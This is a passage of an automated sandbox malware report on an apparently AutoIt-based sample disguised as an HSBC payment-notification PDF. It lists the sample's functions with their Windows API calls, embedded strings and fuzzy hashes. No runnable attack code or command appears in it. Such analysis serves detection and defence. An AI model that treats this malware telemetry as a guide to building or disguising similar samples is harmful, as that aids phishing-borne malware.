                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 464785882-4108050209
                                                                                                                                                    • Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                                                                                                                    • Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
                                                                                                                                                    • Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                                                                                                                    • Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99
                                                                                                                                                    Function 004774AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 004774DE
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
                                                                                                                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0047763F
                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
                                                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 004776A2
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004776A6
                                                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 004776C8
                                                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                                                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
                                                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 004777A6
                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                                                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                                                    • Opcode ID: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                                                                                                                                                    • Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
                                                                                                                                                    • Opcode Fuzzy Hash: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                                                                                                                                                    • Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68
                                                                                                                                                    Function 0046AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                                                    • Opcode ID: d4d08640f91872c216ba8f74001c93904258f000dd65fb750c1087d08048f0fa
                                                                                                                                                    • Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
                                                                                                                                                    • Opcode Fuzzy Hash: d4d08640f91872c216ba8f74001c93904258f000dd65fb750c1087d08048f0fa
                                                                                                                                                    • Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F
                                                                                                                                                    Function 004068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsnicmp
                                                                                                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                    • API String ID: 1038674560-86951937
                                                                                                                                                    • Opcode ID: 898de28bb484df63747157cb3ef6f90b3c7ef963803cd894e05c1e747d8c1ffa
                                                                                                                                                    • Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
                                                                                                                                                    • Opcode Fuzzy Hash: 898de28bb484df63747157cb3ef6f90b3c7ef963803cd894e05c1e747d8c1ffa
                                                                                                                                                    • Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D
                                                                                                                                                    Function 0048A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColor.USER32(00000012), ref: 0048A903
                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 0048A907
                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0048A928
                                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 0048A92D
                                                                                                                                                    • GetSysColor.USER32(00000011), ref: 0048A945
                                                                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0048A964
                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0048A97A
                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
                                                                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
                                                                                                                                                    • DrawFocusRect.USER32(?,?), ref: 0048AA3D
                                                                                                                                                    • GetSysColor.USER32(00000011), ref: 0048AA4B
                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0048AA53
                                                                                                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
                                                                                                                                                    • SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0048AA89
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0048AA8F
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0048AA94
                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 0048AA9A
                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 0048AAA4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1996641542-0
                                                                                                                                                    • Opcode ID: 477735c6bd52301878b185c76481b2a1a4b288ea4f41a62aa18eeb4dbc315d9d
                                                                                                                                                    • Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
                                                                                                                                                    • Opcode Fuzzy Hash: 477735c6bd52301878b185c76481b2a1a4b288ea4f41a62aa18eeb4dbc315d9d
                                                                                                                                                    • Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54
                                                                                                                                                    Function 004889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
                                                                                                                                                    • CharNextW.USER32(0000014E), ref: 00488B01
                                                                                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
                                                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
                                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
                                                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
                                                                                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
                                                                                                                                                    • _memset.LIBCMT ref: 00488C44
                                                                                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
                                                                                                                                                    • _memset.LIBCMT ref: 00488CEC
                                                                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
                                                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
                                                                                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
                                                                                                                                                    • DrawMenuBar.USER32(?), ref: 00488EC3
                                                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 1073566785-4108050209
                                                                                                                                                    • Opcode ID: 6d304d09a9ba669aeba86dcc0ed2949a670ea02e8edc27067d39c7658e1f624e
                                                                                                                                                    • Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
                                                                                                                                                    • Opcode Fuzzy Hash: 6d304d09a9ba669aeba86dcc0ed2949a670ea02e8edc27067d39c7658e1f624e
                                                                                                                                                    • Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69
                                                                                                                                                    Function 0048488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 004849CA
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 004849DF
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 004849E6
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00484A48
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00484A74
                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
                                                                                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
                                                                                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
                                                                                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00484B29
                                                                                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
                                                                                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00484B70
                                                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
                                                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
                                                                                                                                                    • CopyRect.USER32(?,?), ref: 00484BC7
                                                                                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                                                    • Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                                                                                                                                    • Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
                                                                                                                                                    • Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                                                                                                                                    • Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59
                                                                                                                                                    Function 0046449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
                                                                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
                                                                                                                                                    • _wcscpy.LIBCMT ref: 00464500
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046450B
                                                                                                                                                    • _wcscat.LIBCMT ref: 00464521
                                                                                                                                                    • _wcsstr.LIBCMT ref: 0046452C
                                                                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
                                                                                                                                                    • _wcscat.LIBCMT ref: 00464591
                                                                                                                                                    • _wcscat.LIBCMT ref: 00464598
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 004645C3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                    • API String ID: 699586101-1459072770
                                                                                                                                                    • Opcode ID: b88462d4765e7d507f23171d62798ed34a372c9e6a155a9843904c144f7c25e8
                                                                                                                                                    • Instruction ID: 2b480a1fb6a64e9c247c6b56b60e40bdc72f3d5a191167641815a527c939035c
                                                                                                                                                    • Opcode Fuzzy Hash: b88462d4765e7d507f23171d62798ed34a372c9e6a155a9843904c144f7c25e8
                                                                                                                                                    • Instruction Fuzzy Hash: 7641D431A002107BDB14BA75AC43FBF77ACDF81714F50046FF905A6182FA7C9A4296AE
                                                                                                                                                    Function 004027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 004028C4
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 004028F7
                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 0040291C
                                                                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                                                                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                                                                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 004029CA
                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                                                                                                                                                      • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                                                                                                                                                      • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                                                                                                                      • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                                                                                                      • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                                                    • API String ID: 1458621304-248962490
                                                                                                                                                    • Opcode ID: 4ff91775ebca8baf8613358a2091c309939bc505a39819b9e80b7d3697c8673c
                                                                                                                                                    • Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
                                                                                                                                                    • Opcode Fuzzy Hash: 4ff91775ebca8baf8613358a2091c309939bc505a39819b9e80b7d3697c8673c
